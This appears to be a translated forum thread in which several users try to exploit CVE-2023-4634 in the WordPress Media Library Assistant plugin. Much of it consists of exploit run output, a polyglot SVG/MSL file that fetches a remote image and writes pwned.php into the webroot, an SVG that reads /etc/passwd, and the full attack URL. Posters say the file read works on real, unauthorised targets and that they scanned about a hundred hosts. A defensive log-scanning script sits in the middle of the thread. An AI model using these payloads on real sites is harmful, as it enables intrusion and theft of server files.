Had to fight with the installation: the code depends on Python 3.9+, otherwise it throws an error from grequests. Besides that, pillow is missing. On deb:11 (python3.11*), to get a clean install I ran it with this flag:

Code:
    python3 -m pip install -r requirements.txt --break-system-packages

Explain the upload to me:

Code:
    [-] Checking arguments
    [-] All arguments for exploiting target are set, beginning the first checks
    [-] The remote FTP polyglot SVG/MSL file is reachable
    [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
    [-] A sample remote FTP exploiter VID test file is reachable
    [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
    [-] The remote Exploit PNG/PHP file is reachable
    [!] All arguments have been checked correctly, lauching exploitation
    [-] Lauching 100 Threads on long SVG
    [-] Waiting 5 second for the file to be created
    [-] Starting Bruteforcing with VID exploiters
    [-] Checking the drop of pwned.php
    [!] Not yet, try 1 on 9 ... checking again in 10 seconds
    [!] Not yet, try 2 on 9 ... checking again in 10 seconds
    [!] Not yet, try 3 on 9 ... checking again in 10 seconds
    [!] Not yet, try 4 on 9 ... checking again in 10 seconds
    [!] Not yet, try 5 on 9 ... checking again in 10 seconds
    [!] Not yet, try 6 on 9 ... checking again in 10 seconds
    [!] Not yet, try 7 on 9 ... checking again in 10 seconds
    [!] Not yet, try 8 on 9 ... checking again in 10 seconds
    [!] Not yet, try 9 on 9 ... checking again in 10 seconds
    [!] Exploit has not worked, try by increase concurrency value or use another method

Not enough permissions on the webroot? Do we tweak the good old paths with --exploitname one/way/upload/pwned.php ?
UPD: no luck.

Code:
    grep exploitname CVE-2023-4634.py
    '--exploitname',
    exploitname = args.exploitname
    if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname:
        print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red"))
    </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname }
    elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname:
        print(colored("[-] Checking the drop of "+exploitname, "cyan"))
        target_virus = target+"/"+exploitname

upd: unclear, the path is hardcoded in poly.svg:

    cat remote_ftp/poly.svg

Code:
    <?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="http://123.123.123.123:80/virus.png" />
    <resize geometry="400x400" />
    <write filename="/var/www/html/pwned.php" />
    <get width="base-width" height="base-height" />
    <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/>
    </svg>

Manually brought up an FTP server with an open anonymous user and uploaded 2 svg files (1.svg + 1.svg[0]):

Code:
    <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>

When navigating to:

Code:
    http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600

It returns an image with no content.
That is, just a plain white background, no matter how you change *height + width.

Code:
    --webserverpath WEBSERVERPATH
        Path of the webserver on the victim server (could be found with the LFI and wp-config file) example: /var/www/html

https://github.com/Patrowl/CVE-2023-4634/issues/2

And it may well not be found; this needs testing on a local box. If anyone is actually using this or plans to test it, please write back.
This evening we tested a bit on a local box and got strange results; we'll continue tomorrow. In a word: INCOMPREHENSIBLE. There is a connection to the FTP, but GS complains in the logs. Either a specific SVG is needed or the right policy for ImageMagick; I haven't fully figured it out myself yet. The default Debian 12 config did not give way. On a couple of real targets the svg worked, but only as a drawing; reading text via text:/etc/passwd did not succeed. If anyone wants to join our merry little hacker gatherings, write.
Drawing the file contents on top of the image using mla_debug, aka LFI.

Code:
    ...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen...

As far as I understand, the ugly information on top of the image is, in our case, exactly the rendering of /etc/passwd. The example seems erroneous at first glance:

Code:
    <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg">
    <image xlink:href= "text:/etc/passwd" width="500" height="500" />
    </svg>

But it is precisely the error that makes it possible to output the data with mla_debug=true; which dependencies have to be taken into account is still unclear to me. A very finicky bug. Feature: wp-content/plugins/media-library-assistant/readme.txt lets you find out the plugin version. So far I have tested the log output on:

Code:
    = 3.06 =
    = 2.79 =
    = 3.04 =
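An added defensive example, not code from the thread or from the Patrowl PoC: a small Python checker that scans web-server access-log lines for the request shape discussed above, i.e. mla-stream-image.php called with a remote or non-file mla_stream_file source (ftp://, http://, text: and similar ImageMagick coders) or with mla_debug enabled. The endpoint path and parameter names are taken from the URL quoted in the thread; the log lines, IPs and hostnames are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameters quoted in the thread (CVE-2023-4634, Media Library Assistant).
STREAM_ENDPOINT = "/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php"
# Remote protocols and ImageMagick coders that should never appear in a legitimate image request.
RISKY_PREFIXES = ("ftp://", "http://", "https://", "text:", "label:", "msl:", "ephemeral:", "@")

# Constructed access-log lines (common log format); no real host is referenced.
SAMPLE_LOGS = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://198.51.100.7:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600 HTTP/1.1" 200 1234',
    '203.0.113.6 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fuploads%2F2023%2Fdoc.pdf&mla_stream_width=150 HTTP/1.1" 200 4567',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=text:/etc/passwd&mla_debug=true HTTP/1.1" 200 890',
    '203.0.113.8 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 100',
]

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def analyse(line):
    """Return the reasons a log line looks like CVE-2023-4634 probing, or [] if benign."""
    m = REQ_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if parts.path != STREAM_ENDPOINT:
        return []  # only the streaming endpoint is of interest
    qs = parse_qs(parts.query)
    reasons = []
    # parse_qs already URL-decodes once; unquote again to catch double encoding.
    src = unquote(qs.get("mla_stream_file", [""])[0]).strip().lower()
    if src.startswith(RISKY_PREFIXES):
        reasons.append("remote/non-file mla_stream_file: " + src)
    if "mla_debug" in qs:
        reasons.append("debug output requested: mla_debug=" + qs["mla_debug"][0])
    return reasons


def suspicious_lines(lines):
    """Indices of lines that tripped at least one check, with their reasons."""
    return [(i, analyse(l)) for i, l in enumerate(lines) if analyse(l)]


if __name__ == "__main__":
    for idx, why in suspicious_lines(SAMPLE_LOGS):
        print(idx, why)
```

A local file path under wp-content/uploads (line 2) and unrelated requests (line 4) pass; the ftp:// fetch with mla_debug=log and the text: coder read are both flagged.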
Well, we have figured out reading files, it works. There are a couple of caveats, but it works. RCE, however, we have not yet seen on any target. At the moment it is not even clear why the reader works on some targets and not on others. We set up a local box where all the conditions seem to be met, but the "reader" did not fire. Possibly the IM or GS version plays a role.
A hundred hosts with different versions; many have already updated since my last scan. I myself got nowhere with this CVE.
For RCE you need the path. It works here, we did a quick check, finish it off)